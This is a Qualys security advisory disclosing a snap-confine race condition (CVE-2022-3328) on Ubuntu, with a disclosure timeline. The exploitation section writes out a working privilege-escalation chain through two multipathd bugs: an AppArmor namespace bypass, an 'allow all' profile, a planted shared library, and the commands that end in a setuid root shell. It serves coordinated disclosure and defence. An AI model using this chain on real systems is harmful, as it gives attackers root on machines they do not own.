Qualys Security Advisory Race condition in snap-confine's must_mkdir_and_open_with_perms() (CVE-2022-3328) ======================================================================== Contents ======================================================================== Summary Background Exploitation Acknowledgments Timeline I can't help but feel a missed opportunity to integrate lyrics from one of the best songs ever: [SNAP! - The Power (Official Video)] -- https://twitter.com/spendergrsec/status/1494420041076461570 ======================================================================== Summary ======================================================================== We discovered a race condition (CVE-2022-3328) in snap-confine, a SUID-root program installed by default on Ubuntu. In this advisory, we tell the story of this vulnerability (which was introduced in February 2022 by the patch for CVE-2021-44731) and detail how we exploited it in Ubuntu Server (a local privilege escalation, from any user to root) by combining it with two vulnerabilities in multipathd (an authorization bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973): https://www.qualys.com/2022/10/24/leeloo-multipath/leeloo-multipath.txt ======================================================================== Background ======================================================================== Like the crack of the whip, I Snap! attack Radical mind, day and night all the time -- SNAP! - The Power In February 2022, we published CVE-2021-44731 in our "Lemmings" advisory (https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt): to set up a snap's sandbox, snap-confine created the temporary directory /tmp/snap.$SNAP_NAME or reused it if it already existed, even if it did not belong to root; a local attacker could race against snap-confine, retain control over /tmp/snap.$SNAP_NAME, and eventually obtain full root privileges. This vulnerability was patched by commit acb2b4c ("cmd/snap-confine: Prevent user-controlled race in setup_private_mount"), which introduced a new helper function, must_mkdir_and_open_with_perms(): ------------------------------------------------------------------------ 142 static void setup_private_mount(const char *snap_name) ... 169 sc_must_snprintf(base_dir, sizeof(base_dir), "/tmp/snap.%s", snap_name); ... 176 base_dir_fd = must_mkdir_and_open_with_perms(base_dir, 0, 0, 0700); ------------------------------------------------------------------------ 55 static int must_mkdir_and_open_with_perms(const char *dir, uid_t uid, gid_t gid, 56 mode_t mode) .. 61 mkdir: .. 67 if (mkdir(dir, 0700) < 0 && errno != EEXIST) { .. 70 fd = open(dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW); .. 81 if (fstat(fd, &st) < 0) { .. 84 if (st.st_uid != uid || st.st_gid != gid 85 || st.st_mode != (S_IFDIR | mode)) { ... 130 if (rename(dir, random_dir) < 0) { ... 135 goto mkdir; ------------------------------------------------------------------------ - the temporary directory /tmp/snap.$SNAP_NAME is created at line 67, if it does not exist already; - if it already exists, and if it does not belong to root (at line 84), then it is moved out of the way (at line 130) by rename()ing it to a random directory in /tmp, and its creation is retried (at line 135). When we reviewed this patch back in December 2021, we felt very nervous about this rename() call (because it allows a local attacker to rename() a directory they do not own), and we advised the Ubuntu Security Team to either not reuse the directory /tmp/snap.$SNAP_NAME at all, or to create it in a non-world-writable directory instead of /tmp, or at least to use renameat2(RENAME_EXCHANGE) instead of rename(). Unfortunately, all of these ideas were deemed impractical (for example, renameat2() is not supported by older kernel and glibc versions); moreover, we (Qualys) failed to come up with a feasible attack plan against this rename() call, so the patch was kept in its current form. After the release of Ubuntu 22.04 in April 2022, we decided to revisit snap-confine and its recent hardening changes, and we finally found a way to exploit the rename() call in must_mkdir_and_open_with_perms(). ======================================================================== Exploitation ======================================================================== It's getting, it's getting, it's getting kinda heavy It's getting, it's getting, it's getting kinda hectic -- SNAP! - The Power The three key ideas to exploit the rename() of /tmp/snap.$SNAP_NAME are: 1/ snap-confine operates in /tmp to create a snap's temporary directory (/tmp/snap.$SNAP_NAME in setup_private_mount()), but it also operates in /tmp to create the snap's *root* directory (/tmp/snap.rootfs_XXXXXX in sc_bootstrap_mount_namespace(), where all of the Xs are randomized by mkdtemp()), and the string rootfs_XXXXXX is accepted as a valid snap instance name by sc_instance_name_validate() (when all of the Xs are lowercase alphanumeric): ------------------------------------------------------------------------ 286 static void sc_bootstrap_mount_namespace(const struct sc_mount_config *config) ... 288 char scratch_dir[] = "/tmp/snap.rootfs_XXXXXX"; ... 291 if (mkdtemp(scratch_dir) == NULL) { ... 303 sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL); ... 319 sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND, ... 331 for (const struct sc_mount * mnt = config->mounts; mnt->path != NULL; ... 342 sc_must_snprintf(dst, sizeof dst, "%s/%s", scratch_dir, 343 mnt->path); ... 352 sc_do_mount(mnt->path, dst, NULL, MS_REC | MS_BIND, ------------------------------------------------------------------------ 2/ We therefore execute two instances of snap-confine in parallel: - we block the first snap-confine immediately after it creates its root directory /tmp/snap.rootfs_XXXXXX at line 291 (we reliably win this race condition by "single-stepping" snap-confine, as explained in our "Lemmings" advisory); - we execute the second snap-confine with a snap instance name of rootfs_XXXXXX -- i.e., the temporary directory /tmp/snap.$SNAP_NAME of this second snap-confine is the root directory /tmp/snap.rootfs_XXXXXX of the first snap-confine; - we kill this second snap-confine immediately after it rename()s its temporary directory /tmp/snap.$SNAP_NAME -- i.e., the root directory /tmp/snap.rootfs_XXXXXX of the first snap-confine -- at line 130 (we reliably win this race condition with inotify, as explained in our "Lemmings" advisory); - we re-create the directory /tmp/snap.rootfs_XXXXXX ourselves, and resume the execution of the first snap-confine, whose root directory now belongs to us. 3/ We can therefore create an arbitrary symlink /tmp/snap.rootfs_XXXXXX/tmp, and sc_bootstrap_mount_namespace() will bind-mount the real /tmp directory (which is world-writable) onto any directory in the filesystem (because mount() will follow our arbitrary symlink at line 352). This ability will eventually allow us to obtain full root privileges, but we must first solve three problems: ------------------------------------------------------------------------ Problem a/ We cannot trick snap-confine into rename()ing /tmp/snap.rootfs_XXXXXX, because this directory belongs to root and must_mkdir_and_open_with_perms() rename()s it only if it does not belong to root! This problem solves itself naturally: indeed, /tmp/snap.rootfs_XXXXXX belongs to the user root, but it belongs to the group of our own user, so must_mkdir_and_open_with_perms() rename()s it because it does not belong to the group root (at line 84). ------------------------------------------------------------------------ Problem b/ We cannot trick snap-confine into following our symlink /tmp/snap.rootfs_XXXXXX/tmp, because sc_bootstrap_mount_namespace() bind-mounts a read-only squashfs onto /tmp/snap.rootfs_XXXXXX (at line 319): if we create our symlink before this bind-mount, then it becomes covered by the squashfs; and we cannot create our symlink after this bind-mount, because the squashfs is read-only and belongs to root! The "Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount" of our "Lemmings" advisory suggests a solution to this problem: we must unmount /tmp/snap.rootfs_XXXXXX each time sc_bootstrap_mount_namespace() bind-mounts it (at lines 303 and 319). The "(deleted)" technique we used in "Lemmings" (CVE-2021-3996 in util-linux) was patched in January 2022, but we found a surprisingly simple workaround: we mount a FUSE filesystem onto /tmp/snap.rootfs_XXXXXX, immediately after we re-create this directory ourselves; this allows us to unmount (with fusermount -u -z) any subsequent bind-mounts (even if they belong to root), because fusermount does not check that our FUSE filesystem is indeed the most recently mounted filesystem on /tmp/snap.rootfs_XXXXXX. ------------------------------------------------------------------------ Problem c/ We cannot trick snap-confine into bind-mounting the real /tmp onto an arbitrary directory in the filesystem (at line 352), because such a bind-mount is forbidden by snap-confine's AppArmor profile! To solve this problem, we must bypass AppArmor completely, but the technique we used in our "Lemmings" advisory (we wrapped snap-confine's execution in an AppArmor profile that was in "complain" mode, not in "enforce" mode) was patched in February 2022 (by commits 26eed65 and 4a2eb78, "ensure that snap-confine is in strict confinement" and "Tighten AppArmor label check"): now, snap-confine's execution must be wrapped in an AppArmor profile that is in "enforce" mode and whose label matches the regular expression "^(/snap/(snapd|core)/x?[0-9]+/usr/lib|/usr/lib(exec)?)/snapd/snap-confine$". We were about to give up on trying to exploit snap-confine, when we discovered CVE-2022-41974 and CVE-2022-41973 in multipathd (which is installed by default on Ubuntu Server): these two vulnerabilities allow us to create a directory named "failed_wwids" (user root, group root, mode 0700) anywhere in the filesystem, and we were able to transform this very limited directory creation into a complete AppArmor bypass. AppArmor supports policy namespaces that are loosely related to kernel user namespaces; by default, no AppArmor namespaces exist: ------------------------------------------------------------------------ $ ls -la /sys/kernel/security/apparmor/policy/namespaces total 0 drwxr-xr-x 2 root root 0 Aug 6 12:42 . drwxr-xr-x 5 root root 0 Aug 6 12:42 .. ------------------------------------------------------------------------ However, we (attackers) can create an AppArmor namespace "failed_wwids" by exploiting CVE-2022-41974 and CVE-2022-41973 in multipathd: ------------------------------------------------------------------------ $ ln -s /sys/kernel/security/apparmor/policy/namespaces /dev/shm/multipath $ multipathd list devices | grep 'whitelisted, unmonitored' sda1 devnode whitelisted, unmonitored ... $ multipathd list list path sda1 fail $ ls -la /sys/kernel/security/apparmor/policy/namespaces total 0 drwxr-xr-x 3 root root 0 Aug 6 12:42 . drwxr-xr-x 5 root root 0 Aug 6 12:42 .. drwx------ 5 root root 0 Aug 6 13:38 failed_wwids ------------------------------------------------------------------------ Then, we can enter this AppArmor namespace by creating and entering an unprivileged user namespace: ------------------------------------------------------------------------ $ aa-exec -n failed_wwids -p unconfined -- unshare -U -r /bin/sh ------------------------------------------------------------------------ Inside this namespace, we can create an AppArmor profile labeled "/usr/lib/snapd/snap-confine" that is in "enforce" mode and allows all possible operations: ------------------------------------------------------------------------ # apparmor_parser -K -a << "EOF" /usr/lib/snapd/snap-confine (enforce) { capability, network, mount, remount, umount, pivot_root, ptrace, signal, dbus, unix, file, change_profile, } EOF ------------------------------------------------------------------------ Back in the initial namespace, we check that our "allow all" AppArmor profile still exists: ------------------------------------------------------------------------ # aa-status apparmor module is loaded. 32 profiles are loaded. 32 profiles are in enforce mode. ... :failed_wwids:/usr/lib/snapd/snap-confine ------------------------------------------------------------------------ Last, we make sure that snap-confine accepts our "allow all" AppArmor profile (i.e., AppArmor is bypassed, and snap-confine is effectively unconfined): ------------------------------------------------------------------------ $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -n failed_wwids -p /usr/lib/snapd/snap-confine -- /usr/lib/snapd/snap-confine --base lxd snap.lxd.daemon /nonexistent ... DEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confine DEBUG: apparmor mode is: enforce ------------------------------------------------------------------------ We can therefore bind-mount /tmp onto an arbitrary directory in the filesystem (by exploiting CVE-2022-3328); since we already depend on multipathd to bypass AppArmor, we bind-mount /tmp onto /lib/multipath, create our own shared library /lib/multipath/libchecktur.so, shutdown multipathd (by exploiting CVE-2022-41974), restart multipathd (through its Unix socket), and finally obtain full root privileges (because multipathd executes our shared library as root when it restarts): ------------------------------------------------------------------------ $ grep multipath /proc/self/mountinfo | wc 0 0 0 $ gcc -o CVE-2022-3328 CVE-2022-3328.c $ ./CVE-2022-3328 scratch directory for constructing namespace: /tmp/snap.rootfs_0j4u9c $ grep multipath /proc/self/mountinfo 1395 29 253:0 /tmp /usr/lib/multipath rw,relatime shared:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw ... $ gcc -fpic -shared -o /lib/multipath/libchecktur.so libtmpsh.c $ ps -ef | grep 'multipath[d]' root 371 1 0 12:42 ? 00:00:00 /sbin/multipathd -d -s $ multipathd list list add del switch sus resu rei fai resi rese rel forc dis rest paths maps path P map P gro P rec dae statu stats top con bla dev raw wil quit ok $ ps -ef | grep 'multipath[d]' | wc 0 0 0 $ ls -l /tmp/sh ls: cannot access '/tmp/sh': No such file or directory $ multipathd list daemon error -104 receiving packet $ ls -l /tmp/sh -rwsr-xr-x 1 root root 125688 Aug 6 14:55 /tmp/sh $ /tmp/sh -p # id uid=65534(nobody) gid=65534(nogroup) euid=0(root) groups=65534(nogroup) ^^^^^^^^^^^^ ------------------------------------------------------------------------ ======================================================================== Acknowledgments ======================================================================== We thank the Ubuntu security team (Alex Murray and Seth Arnold in particular) and the snapd team for their hard work on this snap-confine vulnerability. We also thank the members of linux-distros@openwall. ======================================================================== Timeline ======================================================================== 2022-08-23: Contacted security@ubuntu. 2022-11-28: Contacted linux-distros@openwall. 2022-11-30: Coordinated Release Date (17:00 UTC).